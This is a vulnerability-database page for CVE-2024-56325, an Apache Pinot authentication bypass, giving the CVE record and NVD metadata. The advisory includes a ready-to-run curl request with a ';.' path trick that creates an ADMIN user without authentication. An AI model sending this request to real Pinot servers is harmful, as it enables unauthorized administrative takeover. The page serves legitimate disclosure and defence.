CVE-2024-56325
Vulnerability from cvelistv5
Published
2025-04-01 09:07
Modified
2025-04-01 10:03
Severity ?
Summary
Authentication Bypass Issue If the path does not contain / and contain., authentication is not required. Expected Normal Request and Response Example curl -X POST -H "Content-Type: application/json" -d {\"username\":\"hack2\",\"password\":\"hack\",\"component\":\"CONTROLLER\",\"role\":\"ADMIN\",\"tables\":[],\"permissions\":[],\"usernameWithComponent\":\"hack_CONTROLLER\"} http://{server_ip}:9000/users Return: {"code":401,"error":"HTTP 401 Unauthorized"} Malicious Request and Response Example curl -X POST -H "Content-Type: application/json" -d '{\"username\":\"hack\",\"password\":\"hack\",\"component\":\"CONTROLLER\",\"role\":\"ADMIN\",\"tables\":[],\"permissions\":[],\"usernameWithComponent\":\"hack_CONTROLLER\"}' http://{serverip}:9000/users; http://{serverip}:9000/users; . Return: {"users":{}} A new user gets added bypassing authentication, enabling the user to control Pinot.
Impacted products
Show details on NVD website


{
   containers: {
      adp: [
         {
            providerMetadata: {
               dateUpdated: "2025-04-01T10:03:56.094Z",
               orgId: "af854a3a-2127-422b-91ae-364da2661108",
               shortName: "CVE",
            },
            references: [
               {
                  url: "http://www.openwall.com/lists/oss-security/2025/03/27/8",
               },
            ],
            title: "CVE Program Container",
         },
      ],
      cna: {
         affected: [
            {
               defaultStatus: "unaffected",
               packageName: "org.apache.pinot.controller.api",
               product: "Apache Pinot",
               vendor: "Apache Software Foundation",
               versions: [
                  {
                     lessThan: "1.3",
                     status: "affected",
                     version: "0",
                     versionType: "maven",
                  },
               ],
            },
         ],
         descriptions: [
            {
               lang: "en",
               supportingMedia: [
                  {
                     base64: false,
                     type: "text/html",
                     value: "<b>Authentication Bypass Issue</b><br><br><span style=\"background-color: rgba(29, 28, 29, 0.04);\">If the path does not contain / and contain., authentication is not required.<br><br><b>Expected Normal Request and Response Example</b><br><br><span style=\"background-color: rgba(29, 28, 29, 0.04);\">curl -X POST -H \"Content-Type: application/json\" -d {\\\"username\\\":\\\"hack2\\\",\\\"password\\\":\\\"hack\\\",\\\"component\\\":\\\"CONTROLLER\\\",\\\"role\\\":\\\"ADMIN\\\",\\\"tables\\\":[],\\\"permissions\\\":[],\\\"usernameWithComponent\\\":\\\"hack_CONTROLLER\\\"} <a target=\"_blank\" rel=\"nofollow\" href=\"http://{server_ip}:9000/users\">http://{server_ip}:9000/users</a><br><br>\nReturn: {\"code\":401,\"error\":\"HTTP 401 Unauthorized\"}</span><br><br><br><b>Malicious Request and Response Example</b> <br><br>curl -X POST -H \"Content-Type: application/json\" -d '{\\\"username\\\":\\\"hack\\\",\\\"password\\\":\\\"hack\\\",\\\"component\\\":\\\"CONTROLLER\\\",\\\"role\\\":\\\"ADMIN\\\",\\\"tables\\\":[],\\\"permissions\\\":[],\\\"usernameWithComponent\\\":\\\"hack_CONTROLLER\\\"}'<b> </b><a target=\"_blank\" rel=\"nofollow\" href=\"http://{serverip}:9000/users;\"><b>http://{serverip}:9000/users;</b></a><b>.</b><br><br>\nReturn: {\"users\":{}}\n<br><br>\n \n\nA new user gets added bypassing authentication, enabling the user to control Pinot.</span><br><br>",
                  },
               ],
               value: "Authentication Bypass Issue\n\nIf the path does not contain / and contain., authentication is not required.\n\nExpected Normal Request and Response Example\n\ncurl -X POST -H \"Content-Type: application/json\" -d {\\\"username\\\":\\\"hack2\\\",\\\"password\\\":\\\"hack\\\",\\\"component\\\":\\\"CONTROLLER\\\",\\\"role\\\":\\\"ADMIN\\\",\\\"tables\\\":[],\\\"permissions\\\":[],\\\"usernameWithComponent\\\":\\\"hack_CONTROLLER\\\"}  http://{server_ip}:9000/users \n\n\nReturn: {\"code\":401,\"error\":\"HTTP 401 Unauthorized\"}\n\n\nMalicious Request and Response Example \n\ncurl -X POST -H \"Content-Type: application/json\" -d '{\\\"username\\\":\\\"hack\\\",\\\"password\\\":\\\"hack\\\",\\\"component\\\":\\\"CONTROLLER\\\",\\\"role\\\":\\\"ADMIN\\\",\\\"tables\\\":[],\\\"permissions\\\":[],\\\"usernameWithComponent\\\":\\\"hack_CONTROLLER\\\"}'  http://{serverip}:9000/users; http://{serverip}:9000/users; .\n\n\nReturn: {\"users\":{}}\n\n\n\n \n\nA new user gets added bypassing authentication, enabling the user to control Pinot.",
            },
         ],
         metrics: [
            {
               other: {
                  content: {
                     text: "critical",
                  },
                  type: "Textual description of severity",
               },
            },
         ],
         problemTypes: [
            {
               descriptions: [
                  {
                     cweId: "CWE-288",
                     description: "CWE-288 Authentication Bypass Using an Alternate Path or Channel",
                     lang: "en",
                     type: "CWE",
                  },
               ],
            },
         ],
         providerMetadata: {
            dateUpdated: "2025-04-01T09:07:14.185Z",
            orgId: "f0158376-9dc2-43b6-827c-5f631a4d8d09",
            shortName: "apache",
         },
         references: [
            {
               tags: [
                  "vendor-advisory",
               ],
               url: "https://lists.apache.org/thread/ksf8qsndr1h66otkbjz2wrzsbw992r8v",
            },
         ],
         source: {
            discovery: "EXTERNAL",
         },
         title: "Apache Pinot: Authentication bypass issue. If the path does not contain / and contain . authentication is not required",
         x_generator: {
            engine: "Vulnogram 0.2.0",
         },
      },
   },
   cveMetadata: {
      assignerOrgId: "f0158376-9dc2-43b6-827c-5f631a4d8d09",
      assignerShortName: "apache",
      cveId: "CVE-2024-56325",
      datePublished: "2025-04-01T09:07:14.185Z",
      dateReserved: "2024-12-19T14:28:37.532Z",
      dateUpdated: "2025-04-01T10:03:56.094Z",
      state: "PUBLISHED",
   },
   dataType: "CVE_RECORD",
   dataVersion: "5.1",
   "vulnerability-lookup:meta": {
      nvd: "{\"cve\":{\"id\":\"CVE-2024-56325\",\"sourceIdentifier\":\"security@apache.org\",\"published\":\"2025-04-01T09:15:15.240\",\"lastModified\":\"2025-04-01T20:26:11.547\",\"vulnStatus\":\"Awaiting Analysis\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Authentication Bypass Issue\\n\\nIf the path does not contain / and contain., authentication is not required.\\n\\nExpected Normal Request and Response Example\\n\\ncurl -X POST -H \\\"Content-Type: application/json\\\" -d {\\\\\\\"username\\\\\\\":\\\\\\\"hack2\\\\\\\",\\\\\\\"password\\\\\\\":\\\\\\\"hack\\\\\\\",\\\\\\\"component\\\\\\\":\\\\\\\"CONTROLLER\\\\\\\",\\\\\\\"role\\\\\\\":\\\\\\\"ADMIN\\\\\\\",\\\\\\\"tables\\\\\\\":[],\\\\\\\"permissions\\\\\\\":[],\\\\\\\"usernameWithComponent\\\\\\\":\\\\\\\"hack_CONTROLLER\\\\\\\"}  http://{server_ip}:9000/users \\n\\n\\nReturn: {\\\"code\\\":401,\\\"error\\\":\\\"HTTP 401 Unauthorized\\\"}\\n\\n\\nMalicious Request and Response Example \\n\\ncurl -X POST -H \\\"Content-Type: application/json\\\" -d '{\\\\\\\"username\\\\\\\":\\\\\\\"hack\\\\\\\",\\\\\\\"password\\\\\\\":\\\\\\\"hack\\\\\\\",\\\\\\\"component\\\\\\\":\\\\\\\"CONTROLLER\\\\\\\",\\\\\\\"role\\\\\\\":\\\\\\\"ADMIN\\\\\\\",\\\\\\\"tables\\\\\\\":[],\\\\\\\"permissions\\\\\\\":[],\\\\\\\"usernameWithComponent\\\\\\\":\\\\\\\"hack_CONTROLLER\\\\\\\"}'  http://{serverip}:9000/users; http://{serverip}:9000/users; .\\n\\n\\nReturn: {\\\"users\\\":{}}\\n\\n\\n\\n \\n\\nA new user gets added bypassing authentication, enabling the user to control Pinot.\"}],\"metrics\":{},\"weaknesses\":[{\"source\":\"security@apache.org\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-288\"}]}],\"references\":[{\"url\":\"https://lists.apache.org/thread/ksf8qsndr1h66otkbjz2wrzsbw992r8v\",\"source\":\"security@apache.org\"},{\"url\":\"http://www.openwall.com/lists/oss-security/2025/03/27/8\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"}]}}",
   },
}


Log in or create an account to share your comment.

Security Advisory comment format.

This schema specifies the format of a comment related to a security advisory.

UUIDv4 of the comment
UUIDv4 of the Vulnerability-Lookup instance
When the comment was created originally
When the comment was last updated
Title of the comment
Description of the comment
The identifier of the vulnerability (CVE ID, GHSA-ID, PYSEC ID, etc.).



Tags
Taxonomy of the tags.


Loading…

Loading…

Loading…

Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
  • Confirmed: The vulnerability is confirmed from an analyst perspective.
  • Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
  • Patched: This vulnerability was successfully patched by the user reporting the sighting.
  • Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
  • Not confirmed: The user expresses doubt about the veracity of the vulnerability.
  • Not patched: This vulnerability was not successfully patched by the user reporting the sighting.